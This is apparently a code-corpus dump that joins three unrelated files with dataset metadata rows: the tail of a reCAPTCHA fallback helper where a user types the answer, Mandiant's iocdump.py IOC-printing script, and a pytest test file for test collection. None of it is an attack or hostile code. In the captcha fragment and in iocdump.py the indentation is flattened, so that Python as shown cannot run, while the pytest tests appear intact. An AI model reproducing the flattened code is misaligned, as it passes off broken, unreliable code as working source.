cval = re.findall('name="c"\s+value="([^"]+)', html)[0]
captcha_imgurl = 'https://www.google.com%s' % (payload.replace('&', '&'))
message = re.sub('</?strong>', '', message)
oSolver = cInputWindow(captcha=captcha_imgurl, msg=message, iteration=iteration)
captcha_response = oSolver.get()
if not captcha_response:
break
data = {'c': cval, 'response': captcha_response}
html = self.net.http_POST("http://www.google.com/recaptcha/api/fallback?k=%s" % (key), form_data=data, headers=headers).content
return token
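    # Typical call (the site key shown is a placeholder):
    #
    #   token = UnCaptchaReCaptcha().processCaptcha('6Lc...site-key...', lang='en')
    #
    # The returned token is then submitted back to the page hosting the
    # reCAPTCHA form.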
| gpl-2.0 | -6,874,958,783,085,708,000 | 42.96988 | 176 | 0.590218 | false |
mandiant/ioc_writer | ioc_writer/scripts/iocdump.py | 1 | 2104 | # iocdump.py
#
# Copyright 2016 FireEye
# Licensed under the Apache 2.0 license. Developed for Mandiant by William
# Gibb.
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Allows for the upgrade of OpenIOC 1.0 IOCs to OpenIOC 1.1 format
#
# Stdlib
from __future__ import print_function
import argparse
import logging
import os
import sys
# Third Party code
# Custom Code
from ..managers import IOCManager
log = logging.getLogger(__name__)
def main(options):
if not options.verbose:
logging.disable(logging.DEBUG)
iocm = IOCManager()
for i in options.input:
iocm.insert(i)
for ioc_obj in iocm.iocs.values():
if options.hide_params:
ioc_obj.display_params = False
print(ioc_obj)
def makeargpaser():
parser = argparse.ArgumentParser(description="Display a textual representation of an IOC or directory of IOCs")
parser.add_argument('input', type=str, nargs='+',
help='Input files or folders')
parser.add_argument('-n', '--no-params', dest='hide_params', default=False, action='store_true',
help='Do not display parameters attached to an IOC.')
parser.add_argument('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='Enable verbose output')
return parser
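# Example invocation (paths hypothetical; assumes the package's console entry
# point or `python -m ioc_writer.scripts.iocdump`):
#
#   iocdump ./iocs/ extra_ioc.xml -n
#
# prints each parsed IOC without displaying attached parameters.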
def _main():
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')
p = makeargpaser()
opts = p.parse_args()
main(opts)
if __name__ == '__main__':
_main() | apache-2.0 | -8,542,234,613,581,370,000 | 32.951613 | 120 | 0.678232 | false |
txomon/pytest | testing/python/collect.py | 1 | 53514 | # -*- coding: utf-8 -*-
import os
import sys
import textwrap
import _pytest._code
import pytest
from _pytest.main import EXIT_NOTESTSCOLLECTED
from _pytest.nodes import Collector
from _pytest.warnings import SHOW_PYTEST_WARNINGS_ARG
class TestModule(object):
def test_failing_import(self, testdir):
modcol = testdir.getmodulecol("import alksdjalskdjalkjals")
pytest.raises(Collector.CollectError, modcol.collect)
def test_import_duplicate(self, testdir):
a = testdir.mkdir("a")
b = testdir.mkdir("b")
p = a.ensure("test_whatever.py")
p.pyimport()
del sys.modules["test_whatever"]
b.ensure("test_whatever.py")
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*import*mismatch*",
"*imported*test_whatever*",
"*%s*" % a.join("test_whatever.py"),
"*not the same*",
"*%s*" % b.join("test_whatever.py"),
"*HINT*",
]
)
def test_import_prepend_append(self, testdir, monkeypatch):
syspath = list(sys.path)
monkeypatch.setattr(sys, "path", syspath)
root1 = testdir.mkdir("root1")
root2 = testdir.mkdir("root2")
root1.ensure("x456.py")
root2.ensure("x456.py")
p = root2.join("test_x456.py")
monkeypatch.syspath_prepend(str(root1))
p.write(
textwrap.dedent(
"""\
import x456
def test():
assert x456.__file__.startswith({!r})
""".format(
str(root2)
)
)
)
with root2.as_cwd():
reprec = testdir.inline_run("--import-mode=append")
reprec.assertoutcome(passed=0, failed=1)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_syntax_error_in_module(self, testdir):
modcol = testdir.getmodulecol("this is a syntax error")
pytest.raises(modcol.CollectError, modcol.collect)
pytest.raises(modcol.CollectError, modcol.collect)
def test_module_considers_pluginmanager_at_import(self, testdir):
modcol = testdir.getmodulecol("pytest_plugins='xasdlkj',")
pytest.raises(ImportError, lambda: modcol.obj)
def test_invalid_test_module_name(self, testdir):
a = testdir.mkdir("a")
a.ensure("test_one.part1.py")
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*test_one.part1*",
"Hint: make sure your test modules/packages have valid Python names.",
]
)
@pytest.mark.parametrize("verbose", [0, 1, 2])
def test_show_traceback_import_error(self, testdir, verbose):
"""Import errors when collecting modules should display the traceback (#1976).
With low verbosity we omit pytest and internal modules, otherwise show all traceback entries.
"""
testdir.makepyfile(
foo_traceback_import_error="""
from bar_traceback_import_error import NOT_AVAILABLE
""",
bar_traceback_import_error="",
)
testdir.makepyfile(
"""
import foo_traceback_import_error
"""
)
args = ("-v",) * verbose
result = testdir.runpytest(*args)
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*",
"Traceback:",
"*from bar_traceback_import_error import NOT_AVAILABLE",
"*cannot import name *NOT_AVAILABLE*",
]
)
assert result.ret == 2
stdout = result.stdout.str()
for name in ("_pytest", os.path.join("py", "_path")):
if verbose == 2:
assert name in stdout
else:
assert name not in stdout
def test_show_traceback_import_error_unicode(self, testdir):
"""Check test modules collected which raise ImportError with unicode messages
are handled properly (#2336).
"""
testdir.makepyfile(
u"""
# -*- coding: utf-8 -*-
raise ImportError(u'Something bad happened ☺')
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*",
"Traceback:",
"*raise ImportError*Something bad happened*",
]
)
assert result.ret == 2
class TestClass(object):
def test_class_with_init_warning(self, testdir):
testdir.makepyfile(
"""
class TestClass1(object):
def __init__(self):
pass
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"*cannot collect test class 'TestClass1' because it has a __init__ constructor"
]
)
def test_class_subclassobject(self, testdir):
testdir.getmodulecol(
"""
class test(object):
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*collected 0*"])
def test_static_method(self, testdir):
"""Support for collecting staticmethod tests (#2528, #2699)"""
testdir.getmodulecol(
"""
import pytest
class Test(object):
@staticmethod
def test_something():
pass
@pytest.fixture
def fix(self):
return 1
@staticmethod
def test_fix(fix):
assert fix == 1
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*collected 2 items*", "*2 passed in*"])
def test_setup_teardown_class_as_classmethod(self, testdir):
testdir.makepyfile(
test_mod1="""
class TestClassMethod(object):
@classmethod
def setup_class(cls):
pass
def test_1(self):
pass
@classmethod
def teardown_class(cls):
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed*"])
def test_issue1035_obj_has_getattr(self, testdir):
modcol = testdir.getmodulecol(
"""
class Chameleon(object):
def __getattr__(self, name):
return True
chameleon = Chameleon()
"""
)
colitems = modcol.collect()
assert len(colitems) == 0
def test_issue1579_namedtuple(self, testdir):
testdir.makepyfile(
"""
import collections
TestCase = collections.namedtuple('TestCase', ['a'])
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
"*cannot collect test class 'TestCase' "
"because it has a __new__ constructor*"
)
def test_issue2234_property(self, testdir):
testdir.makepyfile(
"""
class TestCase(object):
@property
def prop(self):
raise NotImplementedError()
"""
)
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
@pytest.mark.filterwarnings(
"ignore:usage of Generator.Function is deprecated, please use pytest.Function instead"
)
class TestGenerator(object):
def test_generative_functions(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
def test_gen():
yield func1, 17, 3*5
yield func1, 42, 6*7
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "[0]"
assert gencolitems[0].obj.__name__ == "func1"
def test_generative_methods(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
class TestGenMethods(object):
def test_gen(self):
yield func1, 17, 3*5
yield func1, 42, 6*7
"""
)
gencol = modcol.collect()[0].collect()[0].collect()[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "[0]"
assert gencolitems[0].obj.__name__ == "func1"
def test_generative_functions_with_explicit_names(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
def test_gen():
yield "seventeen", func1, 17, 3*5
yield "fortytwo", func1, 42, 6*7
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "['seventeen']"
assert gencolitems[0].obj.__name__ == "func1"
assert gencolitems[1].name == "['fortytwo']"
assert gencolitems[1].obj.__name__ == "func1"
def test_generative_functions_unique_explicit_names(self, testdir):
# generative
modcol = testdir.getmodulecol(
"""
def func(): pass
def test_gen():
yield "name", func
yield "name", func
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
pytest.raises(ValueError, "gencol.collect()")
def test_generative_methods_with_explicit_names(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
class TestGenMethods(object):
def test_gen(self):
yield "m1", func1, 17, 3*5
yield "m2", func1, 42, 6*7
"""
)
gencol = modcol.collect()[0].collect()[0].collect()[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "['m1']"
assert gencolitems[0].obj.__name__ == "func1"
assert gencolitems[1].name == "['m2']"
assert gencolitems[1].obj.__name__ == "func1"
def test_order_of_execution_generator_same_codeline(self, testdir, tmpdir):
o = testdir.makepyfile(
"""
from __future__ import print_function
def test_generative_order_of_execution():
import py, pytest
test_list = []
expected_list = list(range(6))
def list_append(item):
test_list.append(item)
def assert_order_of_execution():
print('expected order', expected_list)
print('but got ', test_list)
assert test_list == expected_list
for i in expected_list:
yield list_append, i
yield assert_order_of_execution
"""
)
reprec = testdir.inline_run(o, SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 7
assert not skipped and not failed
def test_order_of_execution_generator_different_codeline(self, testdir):
o = testdir.makepyfile(
"""
from __future__ import print_function
def test_generative_tests_different_codeline():
import py, pytest
test_list = []
expected_list = list(range(3))
def list_append_2():
test_list.append(2)
def list_append_1():
test_list.append(1)
def list_append_0():
test_list.append(0)
def assert_order_of_execution():
print('expected order', expected_list)
print('but got ', test_list)
assert test_list == expected_list
yield list_append_0
yield list_append_1
yield list_append_2
yield assert_order_of_execution
"""
)
reprec = testdir.inline_run(o, SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 4
assert not skipped and not failed
def test_setupstate_is_preserved_134(self, testdir):
# yield-based tests are messy wrt to setupstate because
# during collection they already invoke setup functions
# and then again when they are run. For now, we want to make sure
# that the old 1.3.4 behaviour is preserved such that all
# yielded functions all share the same "self" instance that
# has been used during collection.
o = testdir.makepyfile(
"""
setuplist = []
class TestClass(object):
def setup_method(self, func):
#print "setup_method", self, func
setuplist.append(self)
self.init = 42
def teardown_method(self, func):
self.init = None
def test_func1(self):
pass
def test_func2(self):
yield self.func2
yield self.func2
def func2(self):
assert self.init
def test_setuplist():
# once for test_func2 during collection
# once for test_func1 during test run
# once for test_func2 during test run
#print setuplist
assert len(setuplist) == 3, len(setuplist)
assert setuplist[0] == setuplist[2], setuplist
assert setuplist[1] != setuplist[2], setuplist
"""
)
reprec = testdir.inline_run(o, "-v", SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 4
assert not skipped and not failed
class TestFunction(object):
@pytest.fixture
def ignore_parametrized_marks_args(self):
"""Provides arguments to pytester.runpytest() to ignore the warning about marks being applied directly
to parameters.
"""
return ("-W", "ignore:Applying marks directly to parameters")
def test_getmodulecollector(self, testdir):
item = testdir.getitem("def test_func(): pass")
modcol = item.getparent(pytest.Module)
assert isinstance(modcol, pytest.Module)
assert hasattr(modcol.obj, "test_func")
@pytest.mark.filterwarnings("default")
def test_function_as_object_instance_ignored(self, testdir):
testdir.makepyfile(
"""
class A(object):
def __call__(self, tmpdir):
0/0
test_a = A()
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"collected 0 items",
"*test_function_as_object_instance_ignored.py:2: "
"*cannot collect 'test_a' because it is not a function.",
]
)
def test_function_equality(self, testdir, tmpdir):
from _pytest.fixtures import FixtureManager
config = testdir.parseconfigure()
session = testdir.Session(config)
session._fixturemanager = FixtureManager(session)
def func1():
pass
def func2():
pass
f1 = pytest.Function(
name="name", parent=session, config=config, args=(1,), callobj=func1
)
assert f1 == f1
f2 = pytest.Function(name="name", config=config, callobj=func2, parent=session)
assert f1 != f2
def test_issue197_parametrize_emptyset(self, testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.parametrize('arg', [])
def test_function(arg):
pass
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(skipped=1)
def test_single_tuple_unwraps_values(self, testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.parametrize(('arg',), [(1,)])
def test_function(arg):
assert arg == 1
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_issue213_parametrize_value_no_equal(self, testdir):
testdir.makepyfile(
"""
import pytest
class A(object):
def __eq__(self, other):
raise ValueError("not possible")
@pytest.mark.parametrize('arg', [A()])
def test_function(arg):
assert arg.__class__.__name__ == "A"
"""
)
reprec = testdir.inline_run("--fulltrace")
reprec.assertoutcome(passed=1)
def test_parametrize_with_non_hashable_values(self, testdir):
"""Test parametrization with non-hashable values."""
testdir.makepyfile(
"""
archival_mapping = {
'1.0': {'tag': '1.0'},
'1.2.2a1': {'tag': 'release-1.2.2a1'},
}
import pytest
@pytest.mark.parametrize('key value'.split(),
archival_mapping.items())
def test_archival_to_version(key, value):
assert key in archival_mapping
assert value == archival_mapping[key]
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=2)
def test_parametrize_with_non_hashable_values_indirect(self, testdir):
"""Test parametrization with non-hashable values with indirect parametrization."""
testdir.makepyfile(
"""
archival_mapping = {
'1.0': {'tag': '1.0'},
'1.2.2a1': {'tag': 'release-1.2.2a1'},
}
import pytest
@pytest.fixture
def key(request):
return request.param
@pytest.fixture
def value(request):
return request.param
@pytest.mark.parametrize('key value'.split(),
archival_mapping.items(), indirect=True)
def test_archival_to_version(key, value):
assert key in archival_mapping
assert value == archival_mapping[key]
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=2)
def test_parametrize_overrides_fixture(self, testdir):
"""Test parametrization when parameter overrides existing fixture with same name."""
testdir.makepyfile(
"""
import pytest
@pytest.fixture
def value():
return 'value'
@pytest.mark.parametrize('value',
['overridden'])
def test_overridden_via_param(value):
assert value == 'overridden'
@pytest.mark.parametrize('somevalue', ['overridden'])
def test_not_overridden(value, somevalue):
assert value == 'value'
assert somevalue == 'overridden'
@pytest.mark.parametrize('other,value', [('foo', 'overridden')])
def test_overridden_via_multiparam(other, value):
assert other == 'foo'
assert value == 'overridden'
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=3)
def test_parametrize_overrides_parametrized_fixture(self, testdir):
"""Test parametrization when parameter overrides existing parametrized fixture with same name."""
testdir.makepyfile(
"""
import pytest
@pytest.fixture(params=[1, 2])
def value(request):
return request.param
@pytest.mark.parametrize('value',
['overridden'])
def test_overridden_via_param(value):
assert value == 'overridden'
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
def test_parametrize_overrides_indirect_dependency_fixture(self, testdir):
"""Test parametrization when parameter overrides a fixture that a test indirectly depends on"""
testdir.makepyfile(
"""
import pytest
fix3_instantiated = False
@pytest.fixture
def fix1(fix2):
return fix2 + '1'
@pytest.fixture
def fix2(fix3):
return fix3 + '2'
@pytest.fixture
def fix3():
global fix3_instantiated
fix3_instantiated = True
return '3'
@pytest.mark.parametrize('fix2', ['2'])
def test_it(fix1):
assert fix1 == '21'
assert not fix3_instantiated
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
@pytest.mark.filterwarnings("ignore:Applying marks directly to parameters")
def test_parametrize_with_mark(self, testdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.foo
@pytest.mark.parametrize('arg', [
1,
pytest.mark.bar(pytest.mark.baz(2))
])
def test_function(arg):
pass
"""
)
keywords = [item.keywords for item in items]
assert (
"foo" in keywords[0]
and "bar" not in keywords[0]
and "baz" not in keywords[0]
)
assert "foo" in keywords[1] and "bar" in keywords[1] and "baz" in keywords[1]
def test_function_equality_with_callspec(self, testdir, tmpdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.parametrize('arg', [1,2])
def test_function(arg):
pass
"""
)
assert items[0] != items[1]
assert not (items[0] == items[1])
def test_pyfunc_call(self, testdir):
item = testdir.getitem("def test_func(): raise ValueError")
config = item.config
class MyPlugin1(object):
def pytest_pyfunc_call(self, pyfuncitem):
raise ValueError
class MyPlugin2(object):
def pytest_pyfunc_call(self, pyfuncitem):
return True
config.pluginmanager.register(MyPlugin1())
config.pluginmanager.register(MyPlugin2())
config.hook.pytest_runtest_setup(item=item)
config.hook.pytest_pyfunc_call(pyfuncitem=item)
def test_multiple_parametrize(self, testdir):
modcol = testdir.getmodulecol(
"""
import pytest
@pytest.mark.parametrize('x', [0, 1])
@pytest.mark.parametrize('y', [2, 3])
def test1(x, y):
pass
"""
)
colitems = modcol.collect()
assert colitems[0].name == "test1[2-0]"
assert colitems[1].name == "test1[2-1]"
assert colitems[2].name == "test1[3-0]"
assert colitems[3].name == "test1[3-1]"
def test_issue751_multiple_parametrize_with_ids(self, testdir):
modcol = testdir.getmodulecol(
"""
import pytest
@pytest.mark.parametrize('x', [0], ids=['c'])
@pytest.mark.parametrize('y', [0, 1], ids=['a', 'b'])
class Test(object):
def test1(self, x, y):
pass
def test2(self, x, y):
pass
"""
)
colitems = modcol.collect()[0].collect()[0].collect()
assert colitems[0].name == "test1[a-c]"
assert colitems[1].name == "test1[b-c]"
assert colitems[2].name == "test2[a-c]"
assert colitems[3].name == "test2[b-c]"
def test_parametrize_skipif(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skipif('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skip_if(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 skipped in *")
def test_parametrize_skip(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skip('')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skip(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 skipped in *")
def test_parametrize_skipif_no_skip(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skipif('False')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skipif_no_skip(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 1 failed, 2 passed in *")
def test_parametrize_xfail(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_xfail(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 xfailed in *")
def test_parametrize_passed(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_xfail(x):
pass
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 xpassed in *")
def test_parametrize_xfail_passed(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('False')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_passed(x):
pass
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 3 passed in *")
def test_function_original_name(self, testdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.parametrize('arg', [1,2])
def test_func(arg):
pass
"""
)
assert [x.originalname for x in items] == ["test_func", "test_func"]
class TestSorting(object):
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0 # NOQA
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1, fn2, fn3:
assert fn != 3
assert fn != modcol
assert fn != [1, 2, 3]
assert [1, 2, 3] != fn
assert modcol != fn
def test_allow_sane_sorting_for_decorators(self, testdir):
modcol = testdir.getmodulecol(
"""
def dec(f):
g = lambda: f(2)
g.place_as = f
return g
def test_b(y):
pass
test_b = dec(test_b)
def test_a(y):
pass
test_a = dec(test_a)
"""
)
colitems = modcol.collect()
assert len(colitems) == 2
assert [item.name for item in colitems] == ["test_b", "test_a"]
class TestConftestCustomization(object):
def test_pytest_pycollect_module(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyModule(pytest.Module):
pass
def pytest_pycollect_makemodule(path, parent):
if path.basename == "test_xyz.py":
return MyModule(path, parent)
"""
)
testdir.makepyfile("def test_some(): pass")
testdir.makepyfile(test_xyz="def test_func(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*<Module*test_pytest*", "*<MyModule*xyz*"])
def test_customized_pymakemodule_issue205_subdir(self, testdir):
b = testdir.mkdir("a").mkdir("b")
b.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makemodule():
outcome = yield
mod = outcome.get_result()
mod.obj.hello = "world"
"""
)
)
b.join("test_module.py").write(
textwrap.dedent(
"""\
def test_hello():
assert hello == "world"
"""
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_customized_pymakeitem(self, testdir):
b = testdir.mkdir("a").mkdir("b")
b.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem():
outcome = yield
if outcome.excinfo is None:
result = outcome.get_result()
if result:
for func in result:
func._some123 = "world"
"""
)
)
b.join("test_module.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.fixture()
def obj(request):
return request.node._some123
def test_hello(obj):
assert obj == "world"
"""
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_pytest_pycollect_makeitem(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
pass
def pytest_pycollect_makeitem(collector, name, obj):
if name == "some":
return MyFunction(name, collector)
"""
)
testdir.makepyfile("def some(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyFunction*some*"])
def test_makeitem_non_underscore(self, testdir, monkeypatch):
modcol = testdir.getmodulecol("def _hello(): pass")
values = []
monkeypatch.setattr(
pytest.Module, "makeitem", lambda self, name, obj: values.append(name)
)
values = modcol.collect()
assert "_hello" not in values
def test_issue2369_collect_module_fileext(self, testdir):
"""Ensure we can collect files with weird file extensions as Python
modules (#2369)"""
# We'll implement a little finder and loader to import files containing
# Python source code whose file extension is ".narf".
testdir.makeconftest(
"""
import sys, os, imp
from _pytest.python import Module
class Loader(object):
def load_module(self, name):
return imp.load_source(name, name + ".narf")
class Finder(object):
def find_module(self, name, path=None):
if os.path.exists(name + ".narf"):
return Loader()
sys.meta_path.append(Finder())
def pytest_collect_file(path, parent):
if path.ext == ".narf":
return Module(path, parent)"""
)
testdir.makefile(
".narf",
"""\
def test_something():
assert 1 + 1 == 2""",
)
# Use runpytest_subprocess, since we're futzing with sys.meta_path.
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("*1 passed*")
def test_setup_only_available_in_subdir(testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
def pytest_runtest_setup(item):
assert item.fspath.purebasename == "test_in_sub1"
def pytest_runtest_call(item):
assert item.fspath.purebasename == "test_in_sub1"
def pytest_runtest_teardown(item):
assert item.fspath.purebasename == "test_in_sub1"
"""
)
)
sub2.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
def pytest_runtest_setup(item):
assert item.fspath.purebasename == "test_in_sub2"
def pytest_runtest_call(item):
assert item.fspath.purebasename == "test_in_sub2"
def pytest_runtest_teardown(item):
assert item.fspath.purebasename == "test_in_sub2"
"""
)
)
sub1.join("test_in_sub1.py").write("def test_1(): pass")
sub2.join("test_in_sub2.py").write("def test_2(): pass")
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
def test_modulecol_roundtrip(testdir):
modcol = testdir.getmodulecol("pass", withinit=False)
trail = modcol.nodeid
newcol = modcol.session.perform_collect([trail], genitems=0)[0]
assert modcol.name == newcol.name
class TestTracebackCutting(object):
def test_skip_simple(self):
excinfo = pytest.raises(pytest.skip.Exception, 'pytest.skip("xxx")')
assert excinfo.traceback[-1].frame.code.name == "skip"
assert excinfo.traceback[-1].ishidden()
def test_traceback_argsetup(self, testdir):
testdir.makeconftest(
"""
import pytest
@pytest.fixture
def hello(request):
raise ValueError("xyz")
"""
)
p = testdir.makepyfile("def test(hello): pass")
result = testdir.runpytest(p)
assert result.ret != 0
out = result.stdout.str()
assert "xyz" in out
assert "conftest.py:5: ValueError" in out
numentries = out.count("_ _ _") # separator for traceback entries
assert numentries == 0
result = testdir.runpytest("--fulltrace", p)
out = result.stdout.str()
assert "conftest.py:5: ValueError" in out
numentries = out.count("_ _ _ _") # separator for traceback entries
assert numentries > 3
def test_traceback_error_during_import(self, testdir):
testdir.makepyfile(
"""
x = 1
x = 2
x = 17
asd
"""
)
result = testdir.runpytest()
assert result.ret != 0
out = result.stdout.str()
assert "x = 1" not in out
assert "x = 2" not in out
result.stdout.fnmatch_lines([" *asd*", "E*NameError*"])
result = testdir.runpytest("--fulltrace")
out = result.stdout.str()
assert "x = 1" in out
assert "x = 2" in out
result.stdout.fnmatch_lines([">*asd*", "E*NameError*"])
def test_traceback_filter_error_during_fixture_collection(self, testdir):
"""integration test for issue #995.
"""
testdir.makepyfile(
"""
import pytest
def fail_me(func):
ns = {}
exec('def w(): raise ValueError("fail me")', ns)
return ns['w']
@pytest.fixture(scope='class')
@fail_me
def fail_fixture():
pass
def test_failing_fixture(fail_fixture):
pass
"""
)
result = testdir.runpytest()
assert result.ret != 0
out = result.stdout.str()
assert "INTERNALERROR>" not in out
result.stdout.fnmatch_lines(["*ValueError: fail me*", "* 1 error in *"])
def test_filter_traceback_generated_code(self):
"""test that filter_traceback() works with the fact that
py.code.Code.path attribute might return an str object.
In this case, one of the entries on the traceback was produced by
dynamically generated code.
See: https://bitbucket.org/pytest-dev/py/issues/71
This fixes #995.
"""
from _pytest.python import filter_traceback
try:
ns = {}
exec("def foo(): raise ValueError", ns)
ns["foo"]()
except ValueError:
_, _, tb = sys.exc_info()
tb = _pytest._code.Traceback(tb)
assert isinstance(tb[-1].path, str)
assert not filter_traceback(tb[-1])
def test_filter_traceback_path_no_longer_valid(self, testdir):
"""test that filter_traceback() works with the fact that
py.code.Code.path attribute might return an str object.
In this case, one of the files in the traceback no longer exists.
This fixes #1133.
"""
from _pytest.python import filter_traceback
testdir.syspathinsert()
testdir.makepyfile(
filter_traceback_entry_as_str="""
def foo():
raise ValueError
"""
)
try:
import filter_traceback_entry_as_str
filter_traceback_entry_as_str.foo()
except ValueError:
_, _, tb = sys.exc_info()
testdir.tmpdir.join("filter_traceback_entry_as_str.py").remove()
tb = _pytest._code.Traceback(tb)
assert isinstance(tb[-1].path, str)
assert filter_traceback(tb[-1])
class TestReportInfo(object):
def test_itemreport_reportinfo(self, testdir, linecomp):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
def reportinfo(self):
return "ABCDE", 42, "custom"
def pytest_pycollect_makeitem(collector, name, obj):
if name == "test_func":
return MyFunction(name, parent=collector)
"""
)
item = testdir.getitem("def test_func(): pass")
item.config.pluginmanager.getplugin("runner")
assert item.location == ("ABCDE", 42, "custom")
def test_func_reportinfo(self, testdir):
item = testdir.getitem("def test_func(): pass")
